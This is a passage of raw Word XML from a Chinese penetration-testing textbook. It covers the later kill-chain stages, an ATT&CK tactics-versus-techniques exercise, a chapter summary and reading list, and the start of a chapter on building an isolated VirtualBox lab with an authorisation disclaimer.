        <w:t xml:space="preserve">：在受害系统上安装持久化恶意软件，如后门、远程访问木马（RAT）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">6.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">命令与控制（Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; Control, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">C2）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：建立攻击者与受害主机之间的控制信道，进行远程操控。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">7.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">目标行动（Actions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Objectives）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者实现最终目的，如数据窃取、信息加密勒索、破坏系统。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（该模型为标准概念框架，具体阶段划分因组织而异。）</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:id="28" w:name="习题-1.3.2-attck-战术与技术之别"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1.3.2 ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">战术与技术之别</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">题目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：解释</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架中“战术（Tactics）”与“技术（Techniques）”的含义，并说明它们的区别与关系。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：战术回答“为什么（Why）”，技术回答“怎么做（How）”。请各举一例。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">矩阵中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">战术（Tactics）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代表攻击者在特定阶段想要达成的战术目标，是攻击行为的“为什么”。例如，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“初始访问（Initial</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Access）”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“执行（Execution）”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“持久化（Persistence）”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">技术（Techniques）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是实现这些战术的具体方法，是“怎么做”。例如，为实现“持久化”战术，攻击者可以采用“计划任务（Scheduled</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Task，T1053.005）”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“登录项（Launch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Daemon，T1543.004）”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等技术。战术与技术构成二维关系：一种战术可由多种技术实现，同一技术也可能服务于不同战术（如“PowerShell”可同时用于执行、横向移动等）。ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的具体技术编号（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">T1053.005）随版本更新可能发生变化，学习者应以官方最新矩阵为准。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="30" w:name="小结"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻防对称是本书核心教学原则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：教授攻击技术时必须同步提供防御检测与修复方法，避免单纯的攻击炫耀，确保读者具备全面的安全能力。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">红队、蓝队、紫队的角色清晰且互补</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：红队模拟威胁以暴露弱点，蓝队构建监测与防御体系，紫队作为协同工作模式整合二者，实现持续安全改进。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">伦理与授权是安全从业者的生命线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：所有攻击模拟必须在明确的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RoE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与授权环境下进行，本书后续所有实操均基于隔离实验室设置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">杀伤链与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">为攻防提供共同语言</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：杀伤链从阶段视角描述攻击过程，ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为每一阶段提供细粒度的战术与技术映射，二者结合构成全书各章的坐标系。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">本书结构服务于攻防能力培养</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：卷二至卷四侧重红队技术，卷五侧重蓝队，每章中的防御框和靶机实操单元共同支撑紫队思维的养成。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkStart w:id="31" w:name="延伸阅读"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">官方文档</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（attack.mitre.org）：持续更新的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">矩阵是全书最重要的外部知识库，建议读者经常访问以获取最新的战术、技术与缓解措施。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bejtlich, R.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">《The Practice of Network Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitoring》：网络监控与入检检测领域的经典著作，深入阐述如何通过数据驱动的方式发现入侵，是蓝队能力构建的必读书。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Weidman, G.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">《Penetration Testing: A Hands-On Introduction to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Hacking》：基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的渗透测试入门教材，覆盖从环境搭建到漏洞利用的全流程，与本书卷二至卷四有较好的互补性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OffSec PWK/PEN-200 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">课程材料</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：国际权威渗透测试认证</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OSCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的官方课程，强调实践与授权环境下的枚举、利用与报告能力。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">NIST SP 800-115</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">《Technical Guide to Information Security Testing and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Assessment》：美国国家标准与技术研究院发布的安全测试与评估技术指南，为渗透测试方法论提供权威参考。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:id="34" w:name="搭建你的靶场全书实操底座"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">搭建你的靶场（全书实操底座）★</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="33" w:name="虚拟化与隔离网络实验室的骨架"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">虚拟化与隔离网络:实验室的骨架</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ★</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节是全书实操体系的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">根节点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——后续所有靶机演练、工具操作、攻防对抗均依赖于此搭建的实验室骨架。在动手之前，我们必须先回答一个根本问题：为什么渗透测试实验室必须物理或逻辑隔离于任何生产网络与公网？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">动机：攻击者视角与防御者视角</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">站在攻击者（红队）的角度，一个可控、可还原的隔离环境是其演练攻击技术的“沙箱”。在这个沙箱中，攻击者可以安全地尝试漏洞利用、横向移动、权限提升等破坏性操作，而不必担心意外波及真实系统或触犯法律。站在防御者（蓝队）的角度，隔离实验室同样是构建检测规则、分析攻击流量、验证防御策略的理想环境。蓝队可以在隔离网络中释放恶意样本、复现攻击链，观察其在受控条件下的行为，从而提炼出可用于生产环境的入侵检测指标（IOC）和检测规则。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">然而，一旦这个实验室的网络边界没有妥善隔离，攻击流量——例如端口扫描、漏洞利用载荷、恶意软件信标（beacon）——就可能泄漏到宿主机的物理网络甚至公网。这不仅构成严重的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">法律与伦理风险</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（未授权扫描或攻击外部系统在多数法域属于违法），也可能触发生产环境中的安全告警，污染网络流量日志，甚至导致实验室所在网络的出口IP被列入威胁情报黑名单。因此，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">“最小爆炸半径”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">（Minimum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Blast </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Radius）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是实验室网络设计的首要原则：确保所有攻击性数据包的生命周期被严格限制在虚拟化隔离网络内部。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明框</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节及后续所有章节中包含的所有命令、配置与操作，仅限读者在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">自己搭建的隔离实验室内</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">官方明确授权的靶场平台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hack The Box、TryHackMe、VulnHub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">官方镜像、OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Broken Web Applications </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">项目等）上执行。实验网络必须与你的宿主机所在的生产网络、企业网络及公共互联网实现物理或逻辑隔离。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">未经书面授权而对他人系统进行扫描、渗透或攻击，无论目的为何，均属违法行为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。本书作者与出版方不对任何违反此声明的行为承担责任。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="33"/>
    <w:bookmarkEnd w:id="34"/>
    <w:bookmarkStart w:id="37" w:name="虚拟化选型与隔离网络原理"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">虚拟化选型与隔离网络原理</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="35" w:name="虚拟化平台"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">虚拟化平台</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">构建隔离实验室的第一步是选择虚拟化平台。当前业界的主流选项包括</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Oracle VM VirtualBox、VMware Workstation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Pro/Player（以及对应的免费版</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VMware Workstation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Player）与开源的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> QEMU/KVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">体系。本书所有实操单元</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> VirtualBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">为主要演示平台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，原因有三：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">VirtualBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是跨平台（Windows、macOS、Linux）的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">自由软件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（GPLv2），任何读者都可以零成本获取并使用，这符合本书降低学习门槛的宗旨。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">VirtualBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的命令行工具</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vboxmanage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提供了完整的脚本化能力，使得实验室的创建、销毁、快照管理可以自动化与可复现，这与现代安全工程中的基础设施即代码（Infrastructure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as Code, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IaC）理念一致。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
